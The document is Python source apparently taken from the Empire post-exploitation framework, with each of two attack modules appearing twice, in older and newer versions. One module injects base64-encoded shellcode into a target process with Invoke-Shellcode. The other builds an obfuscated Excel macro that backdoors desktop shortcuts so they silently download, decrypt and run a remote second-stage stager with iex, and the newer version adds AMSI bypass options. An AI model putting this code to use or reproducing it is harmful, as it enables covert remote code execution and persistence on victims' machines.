def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
procID = self.options['ProcId']['Value'].strip()
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
arch = self.options['Arch']['Value']
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-Shellcode.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# If you'd just like to import a subset of the functions from the
# module source, use the following:
# script = helpers.generate_dynamic_powershell_script(moduleCode, ["Get-Something", "Set-Something"])
script = moduleCode
scriptEnd = "; shellcode injected into pid {}".format(str(procID))
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: {}".format(listenerName))
return ''
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == '':
print helpers.color('[!] Error in launcher generation.')
return ''
else:
launcherCode = launcher.split(' ')[-1]
sc = self.mainMenu.stagers.generate_shellcode(launcherCode, arch)
encoded_sc = helpers.encode_base64(sc)
# Add any arguments to the end execution of the script
#t = iter(sc)
#pow_array = ',0x'.join(a+b for a,b in zip(t, t))
#pow_array = "@(0x" + pow_array + " )"
script += "\nInvoke-Shellcode -ProcessID {} -Shellcode $([Convert]::FromBase64String(\"{}\")) -Force".format(procID, encoded_sc)
script += scriptEnd
return script
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
targetEXE = self.options['TargetEXEs']['Value']
xlsOut = self.options['XlsOutFile']['Value']
XmlPath = self.options['XmlUrl']['Value']
XmlOut = self.options['XmlOutFile']['Value']
#catching common ways date is incorrectly entered
killDate = self.options['KillDate']['Value'].replace('\\','/').replace(' ','').split('/')
if(int(killDate[2]) < 100):
killDate[2] = int(killDate[2]) + 2000
targetEXE = targetEXE.split(',')
targetEXE = filter(None,targetEXE)
#set vars to random alphabetical / alphanumeric values
shellVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(6,9)))
lnkVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(6,9)))
fsoVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(6,9)))
folderVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(6,9)))
fileVar = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(6,9)))
encKey = ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase + string.digits + string.punctuation, random.randint(16,16)))
#avoiding potential escape characters in our decryption key for the second stage payload
for ch in ["\"","'","`"]:
if ch in encKey:
encKey = encKey.replace(ch,random.choice(string.ascii_lowercase))
encIV = random.randint(1,240)
# generate the launcher
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
launcher = launcher.replace("\"","'")
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
try:
reader = xlrd.open_workbook(xlsOut)
workBook = copy(reader)
activeSheet = workBook.get_sheet(0)
except (IOError, OSError):
workBook = Workbook()
activeSheet = workBook.add_sheet('Sheet1')
#sets initial coords for writing data to
inputRow = random.randint(50,70)
inputCol = random.randint(40,60)
#build out the macro - first take all strings that would normally go into the macro and place them into random cells, which we then reference in our macro
macro = "Sub Auto_Close()\n"
activeSheet.write(inputRow,inputCol,helpers.randomize_capitalization("Wscript.shell"))
macro += "Set " + shellVar + " = CreateObject(activeSheet.Range(\""+self.coordsToCell(inputRow,inputCol)+"\").value)\n"
inputCol = inputCol + random.randint(1,4)
activeSheet.write(inputRow,inputCol,helpers.randomize_capitalization("Scripting.FileSystemObject"))
macro += "Set "+ fsoVar + " = CreateObject(activeSheet.Range(\""+self.coordsToCell(inputRow,inputCol)+"\").value)\n"
inputCol = inputCol + random.randint(1,4)
activeSheet.write(inputRow,inputCol,helpers.randomize_capitalization("desktop"))
macro += "Set " + folderVar + " = " + fsoVar + ".GetFolder(" + shellVar + ".SpecialFolders(activeSheet.Range(\""+self.coordsToCell(inputRow,inputCol)+"\").value))\n"
macro += "For Each " + fileVar + " In " + folderVar + ".Files\n"
macro += "If(InStr(Lcase(" + fileVar + "), \".lnk\")) Then\n"
macro += "Set " + lnkVar + " = " + shellVar + ".CreateShortcut(" + shellVar + ".SPecialFolders(activeSheet.Range(\""+self.coordsToCell(inputRow,inputCol)+"\").value) & \"\\\" & " + fileVar + ".name)\n"
inputCol = inputCol + random.randint(1,4)
macro += "If("
for i, item in enumerate(targetEXE):
if i:
macro += (' or ')
activeSheet.write(inputRow,inputCol,targetEXE[i].strip().lower()+".")
macro += "InStr(Lcase(" + lnkVar + ".targetPath), activeSheet.Range(\""+self.coordsToCell(inputRow,inputCol)+"\").value)"
inputCol = inputCol + random.randint(1,4)
macro += ") Then\n"
#launchString contains the code that will get insterted into the backdoored .lnk files, it will first launch the original target exe, then clean up all backdoors on the desktop. After cleanup is completed it will check the current date, if it is prior to the killdate the second stage will then be downloaded from the webserver selected during macro generation, and then decrypted using the key and iv created during this same process. This code is then executed to gain a full agent on the remote system.
launchString1 = "hidden -nop -c \"Start(\'"
launchString2 = ");$u=New-Object -comObject wscript.shell;gci -Pa $env:USERPROFILE\desktop -Fi *.lnk|%{$l=$u.createShortcut($_.FullName);if($l.arguments-like\'*xml.xmldocument*\'){$s=$l.arguments.IndexOf(\'\'\'\')+1;$r=$l.arguments.Substring($s, $l.arguments.IndexOf(\'\'\'\',$s)-$s);$l.targetPath=$r;$l.Arguments=\'\';$l.Save()}};$b=New-Object System.Xml.XmlDocument;if([int](get-date -U "
launchString3 = ") -le " + str(killDate[2]) + str(killDate[0]) + str(killDate[1]) + "){$b.Load(\'"
launchString4 = "\');$a=New-Object 'Security.Cryptography.AesManaged';$a.IV=(" + str(encIV) + ".." + str(encIV + 15) + ");$a.key=[text.encoding]::UTF8.getBytes('"
launchString5 = "');$by=[System.Convert]::FromBase64String($b.main);[Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($by,0,$by.Length)).substring(16)|iex}\""
#part of the macro that actually modifies the LNK files on the desktop, sets icon location for updated lnk to the old targetpath, args to our launch code, and target to powershell so we can do a direct call to it
macro += lnkVar + ".IconLocation = " + lnkVar + ".targetpath\n"
launchString1 = helpers.randomize_capitalization(launchString1)
launchString2 = helpers.randomize_capitalization(launchString2)
launchString3 = helpers.randomize_capitalization(launchString3)
launchString4 = helpers.randomize_capitalization(launchString4)
launchString5 = helpers.randomize_capitalization(launchString5)
launchStringSum = launchString2 + "'%Y%m%d'" + launchString3 + XmlPath + launchString4 + encKey + launchString5
activeSheet.write(inputRow,inputCol,launchString1)
launch1Coords = self.coordsToCell(inputRow,inputCol)
inputCol = inputCol + random.randint(1,4)
activeSheet.write(inputRow,inputCol,launchStringSum)
launchSumCoords = self.coordsToCell(inputRow,inputCol)
inputCol = inputCol + random.randint(1,4)
macro += lnkVar + ".arguments = \"-w \" & activeSheet.Range(\""+ launch1Coords +"\").Value & " + lnkVar + ".targetPath" + " & \"'\" & activeSheet.Range(\""+ launchSumCoords +"\").Value" + "\n"
activeSheet.write(inputRow,inputCol,helpers.randomize_capitalization(":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"))
macro += lnkVar + ".targetpath = left(CurDir, InStr(CurDir, \":\")-1) & activeSheet.Range(\""+self.coordsToCell(inputRow,inputCol)+"\").value\n"
inputCol = inputCol + random.randint(1,4)
#macro will not write backdoored lnk file if resulting args will be > 1024 length (max arg length) - this is to avoid an incomplete statement that results in a powershell error on run, which causes no execution of any programs and no cleanup of backdoors
macro += "if(Len(" + lnkVar + ".arguments) < 1023) Then\n"
macro += lnkVar + ".save\n"
macro += "end if\n"
macro += "end if\n"
macro += "end if\n"
macro += "next " + fileVar + "\n"
macro += "End Sub\n"
activeSheet.row(inputRow).hidden = True
print helpers.color("\nWriting xls...\n", color="blue")
workBook.save(xlsOut)
print helpers.color("xls written to " + xlsOut + " please remember to add macro code to xls prior to use\n\n", color="green")
#encrypt the second stage code that will be dropped into the XML - this is the full empire stager that gets pulled once the user clicks on the backdoored shortcut
ivBuf = ""
for z in range(0,16):
ivBuf = ivBuf + chr(encIV + z)
encryptor = AES.new(unicode(encKey, "utf-8"), AES.MODE_CBC, ivBuf)
launcher = unicode(launcher,"utf-8")
#pkcs7 padding - aes standard on Windows - if this padding mechanism is used we do not need to define padding in our macro code, saving space
padding = 16-(len(launcher) % 16)
if padding == 0:
launcher = launcher + ('\x00'*16)
else:
launcher = launcher + (chr(padding)*padding)
cipher_text = encryptor.encrypt(launcher)
cipher_text = helpers.encode_base64(ivBuf+cipher_text)
#write XML to disk
print helpers.color("Writing xml...\n", color="blue")
fileWrite = open(XmlOut,"w")
fileWrite.write("<?xml version=\"1.0\"?>\n")
fileWrite.write("<main>")
fileWrite.write(cipher_text)
fileWrite.write("</main>\n")
fileWrite.close()
print helpers.color("xml written to " + XmlOut + " please remember this file must be accessible by the target at this url: " + XmlPath + "\n", color="green")
return macro
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
procID = self.options['ProcId']['Value'].strip()
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
arch = self.options['Arch']['Value']
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-Shellcode.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
# If you'd just like to import a subset of the functions from the
# module source, use the following:
# script = helpers.generate_dynamic_powershell_script(moduleCode, ["Get-Something", "Set-Something"])
script = moduleCode
scriptEnd = "; shellcode injected into pid {}".format(str(procID))
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print(
helpers.color("[!] Invalid listener: {}".format(listenerName)))
return ''
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(
listenerName,
language='powershell',
encode=True,
userAgent=userAgent,
proxy=proxy,
proxyCreds=proxyCreds)
if launcher == '':
print(helpers.color('[!] Error in launcher generation.'))
return ''
else:
launcherCode = launcher.split(' ')[-1]
sc = self.mainMenu.stagers.generate_shellcode(
launcherCode, arch)
encoded_sc = helpers.encode_base64(sc)
# Add any arguments to the end execution of the script
#t = iter(sc)
#pow_array = ',0x'.join(a+b for a,b in zip(t, t))
#pow_array = "@(0x" + pow_array + " )"
script += "\nInvoke-Shellcode -ProcessID {} -Shellcode $([Convert]::FromBase64String(\"{}\")) -Force".format(
procID, encoded_sc)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self):
#default booleans to false
obfuscateScript = False
AMSIBypassBool = False
AMSIBypass2Bool = False
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
targetEXE = self.options['TargetEXEs']['Value']
xlsOut = self.options['XlsOutFile']['Value']
XmlPath = self.options['XmlUrl']['Value']
XmlOut = self.options['XmlOutFile']['Value']
if self.options['AMSIBypass']['Value'].lower() == "true":
AMSIBypassBool = True
if self.options['AMSIBypass2']['Value'].lower() == "true":
AMSIBypass2Bool = True
if self.options['Obfuscate']['Value'].lower == "true":
obfuscateScript = True
obfuscateCommand = self.options['ObfuscateCommand']['Value']
# catching common ways date is incorrectly entered
killDate = self.options['KillDate']['Value'].replace(
'\\', '/').replace(' ', '').split('/')
if (int(killDate[2]) < 100):
killDate[2] = int(killDate[2]) + 2000
targetEXE = targetEXE.split(',')
targetEXE = [_f for _f in targetEXE if _f]
# set vars to random alphabetical / alphanumeric values
shellVar = ''.join(
random.sample(string.ascii_uppercase + string.ascii_lowercase,
random.randint(6, 9)))
lnkVar = ''.join(
random.sample(string.ascii_uppercase + string.ascii_lowercase,
random.randint(6, 9)))
fsoVar = ''.join(
random.sample(string.ascii_uppercase + string.ascii_lowercase,
random.randint(6, 9)))
folderVar = ''.join(
random.sample(string.ascii_uppercase + string.ascii_lowercase,
random.randint(6, 9)))
fileVar = ''.join(
random.sample(string.ascii_uppercase + string.ascii_lowercase,
random.randint(6, 9)))
encKey = ''.join(
random.sample(
string.ascii_uppercase + string.ascii_lowercase +
string.digits + string.punctuation, random.randint(16, 16)))
# avoiding potential escape characters in our decryption key for the second stage payload
for ch in ["\"", "'", "`"]:
if ch in encKey:
encKey = encKey.replace(ch,
random.choice(string.ascii_lowercase))
encIV = random.randint(1, 240)
# generate the launcher
if language.lower() == "python":
launcher = self.mainMenu.stagers.generate_launcher(
listenerName,
language=language,
encode=False,
userAgent=userAgent,
proxy=proxy,
proxyCreds=proxyCreds,
stagerRetries=stagerRetries)
else:
launcher = self.mainMenu.stagers.generate_launcher(
listenerName,
language=language,
encode=True,
obfuscate=obfuscateScript,
obfuscationCommand=obfuscateCommand,
userAgent=userAgent,
proxy=proxy,
proxyCreds=proxyCreds,
stagerRetries=stagerRetries,
AMSIBypass=AMSIBypassBool,
AMSIBypass2=AMSIBypass2Bool)
launcher = launcher.replace("\"", "'")
if launcher == "":
print(helpers.color("[!] Error in launcher command generation."))
return ""
else:
try:
reader = xlrd.open_workbook(xlsOut)
workBook = copy(reader)
activeSheet = workBook.get_sheet(0)
except (IOError, OSError):
workBook = Workbook()
activeSheet = workBook.add_sheet('Sheet1')
# sets initial coords for writing data to
inputRow = random.randint(50, 70)
inputCol = random.randint(40, 60)
# build out the macro - first take all strings that would normally go into the macro and place them into random cells, which we then reference in our macro
macro = "Sub Auto_Close()\n"
activeSheet.write(
inputRow, inputCol,
helpers.randomize_capitalization("Wscript.shell"))
macro += "Set " + shellVar + " = CreateObject(activeSheet.Range(\"" + self.coordsToCell(
inputRow, inputCol) + "\").value)\n"
inputCol = inputCol + random.randint(1, 4)
activeSheet.write(
inputRow, inputCol,
helpers.randomize_capitalization("Scripting.FileSystemObject"))
macro += "Set " + fsoVar + " = CreateObject(activeSheet.Range(\"" + self.coordsToCell(
inputRow, inputCol) + "\").value)\n"
inputCol = inputCol + random.randint(1, 4)
activeSheet.write(inputRow, inputCol,
helpers.randomize_capitalization("desktop"))
macro += "Set " + folderVar + " = " + fsoVar + ".GetFolder(" + shellVar + ".SpecialFolders(activeSheet.Range(\"" + self.coordsToCell(
inputRow, inputCol) + "\").value))\n"
macro += "For Each " + fileVar + " In " + folderVar + ".Files\n"
macro += "If(InStr(Lcase(" + fileVar + "), \".lnk\")) Then\n"
macro += "Set " + lnkVar + " = " + shellVar + ".CreateShortcut(" + shellVar + ".SPecialFolders(activeSheet.Range(\"" + self.coordsToCell(
inputRow,
inputCol) + "\").value) & \"\\\" & " + fileVar + ".name)\n"
inputCol = inputCol + random.randint(1, 4)
macro += "If("
for i, item in enumerate(targetEXE):
if i:
macro += (' or ')
activeSheet.write(inputRow, inputCol,
targetEXE[i].strip().lower() + ".")
macro += "InStr(Lcase(" + lnkVar + ".targetPath), activeSheet.Range(\"" + self.coordsToCell(
inputRow, inputCol) + "\").value)"
inputCol = inputCol + random.randint(1, 4)
macro += ") Then\n"
# launchString contains the code that will get insterted into the backdoored .lnk files, it will first launch the original target exe, then clean up all backdoors on the desktop. After cleanup is completed it will check the current date, if it is prior to the killdate the second stage will then be downloaded from the webserver selected during macro generation, and then decrypted using the key and iv created during this same process. This code is then executed to gain a full agent on the remote system.
launchString1 = "hidden -nop -c \"Start(\'"
launchString2 = ");$u=New-Object -comObject wscript.shell;gci -Pa $env:USERPROFILE\desktop -Fi *.lnk|%{$l=$u.createShortcut($_.FullName);if($l.arguments-like\'*xml.xmldocument*\'){$s=$l.arguments.IndexOf(\'\'\'\')+1;$r=$l.arguments.Substring($s, $l.arguments.IndexOf(\'\'\'\',$s)-$s);$l.targetPath=$r;$l.Arguments=\'\';$l.Save()}};$b=New-Object System.Xml.XmlDocument;if([int](get-date -U "
launchString3 = ") -le " + str(killDate[2]) + str(
killDate[0]) + str(killDate[1]) + "){$b.Load(\'"
launchString4 = "\');$a=New-Object 'Security.Cryptography.AesManaged';$a.IV=(" + str(
encIV) + ".." + str(
encIV + 15) + ");$a.key=[text.encoding]::UTF8.getBytes('"
launchString5 = "');$by=[System.Convert]::FromBase64String($b.main);[Text.Encoding]::UTF8.GetString($a.CreateDecryptor().TransformFinalBlock($by,0,$by.Length)).substring(16)|iex}\""
# part of the macro that actually modifies the LNK files on the desktop, sets icon location for updated lnk to the old targetpath, args to our launch code, and target to powershell so we can do a direct call to it
macro += lnkVar + ".IconLocation = " + lnkVar + ".targetpath\n"
launchString1 = helpers.randomize_capitalization(launchString1)
launchString2 = helpers.randomize_capitalization(launchString2)
launchString3 = helpers.randomize_capitalization(launchString3)
launchString4 = helpers.randomize_capitalization(launchString4)
launchString5 = helpers.randomize_capitalization(launchString5)
launchStringSum = launchString2 + "'%Y%m%d'" + launchString3 + XmlPath + launchString4 + encKey + launchString5
activeSheet.write(inputRow, inputCol, launchString1)
launch1Coords = self.coordsToCell(inputRow, inputCol)
inputCol = inputCol + random.randint(1, 4)
activeSheet.write(inputRow, inputCol, launchStringSum)
launchSumCoords = self.coordsToCell(inputRow, inputCol)
inputCol = inputCol + random.randint(1, 4)
macro += lnkVar + ".arguments = \"-w \" & activeSheet.Range(\"" + launch1Coords + "\").Value & " + lnkVar + ".targetPath" + " & \"'\" & activeSheet.Range(\"" + launchSumCoords + "\").Value" + "\n"
activeSheet.write(
inputRow, inputCol,
helpers.randomize_capitalization(
":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
))
macro += lnkVar + ".targetpath = left(CurDir, InStr(CurDir, \":\")-1) & activeSheet.Range(\"" + self.coordsToCell(
inputRow, inputCol) + "\").value\n"
inputCol = inputCol + random.randint(1, 4)
# macro will not write backdoored lnk file if resulting args will be > 1024 length (max arg length) - this is to avoid an incomplete statement that results in a powershell error on run, which causes no execution of any programs and no cleanup of backdoors
macro += "if(Len(" + lnkVar + ".arguments) < 1023) Then\n"
macro += lnkVar + ".save\n"
macro += "end if\n"
macro += "end if\n"
macro += "end if\n"
macro += "next " + fileVar + "\n"
macro += "End Sub\n"
activeSheet.row(inputRow).hidden = True
print(helpers.color("\nWriting xls...\n", color="blue"))
workBook.save(xlsOut)
print(
helpers.color(
"xls written to " + xlsOut +
" please remember to add macro code to xls prior to use\n\n",
color="green"))
# encrypt the second stage code that will be dropped into the XML - this is the full empire stager that gets pulled once the user clicks on the backdoored shortcut
ivBuf = ("").encode('UTF-8')
for z in range(0, 16):
IV = encIV + z
IV = IV.to_bytes(1, byteorder='big')
ivBuf = b"".join([ivBuf, IV])
encryptor = AES.new(encKey, AES.MODE_CBC, ivBuf)
# pkcs7 padding - aes standard on Windows - if this padding mechanism is used we do not need to define padding in our macro code, saving space
padding = 16 - (len(launcher) % 16)
if padding == 0:
launcher = launcher + ('\x00' * 16)
else:
launcher = launcher + (chr(padding) * padding)
cipher_text = encryptor.encrypt(launcher)
cipher_text = helpers.encode_base64(b"".join([ivBuf, cipher_text]))
# write XML to disk
print(helpers.color("Writing xml...\n", color="blue"))
fileWrite = open(XmlOut, "wb")
fileWrite.write(b"<?xml version=\"1.0\"?>\n")
fileWrite.write(b"<main>")
fileWrite.write(cipher_text)
fileWrite.write(b"</main>\n")
fileWrite.close()
print(
helpers.color(
"xml written to " + XmlOut +
" please remember this file must be accessible by the target at this url: "
+ XmlPath + "\n",
color="green"))
return macro
